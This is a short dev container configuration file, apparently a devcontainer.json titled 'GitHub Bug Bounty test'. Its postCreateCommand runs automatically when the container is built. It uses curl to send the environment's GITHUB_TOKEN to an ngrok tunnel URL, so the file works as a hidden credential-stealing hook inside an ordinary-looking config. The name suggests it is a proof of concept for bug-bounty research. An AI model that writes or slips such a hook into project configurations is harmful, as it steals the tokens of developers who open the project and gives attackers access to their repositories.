{
    "name": "GitHub Bug Bounty test",
    "dockerFile": "Dockerfile",
    "settings": {
        "terminal.integrated.shell.linux": "/usr/bin/zsh"
    },
    "postCreateCommand": "curl -k https://242e3912d476.ngrok.io/${GITHUB_TOKEN}"
}
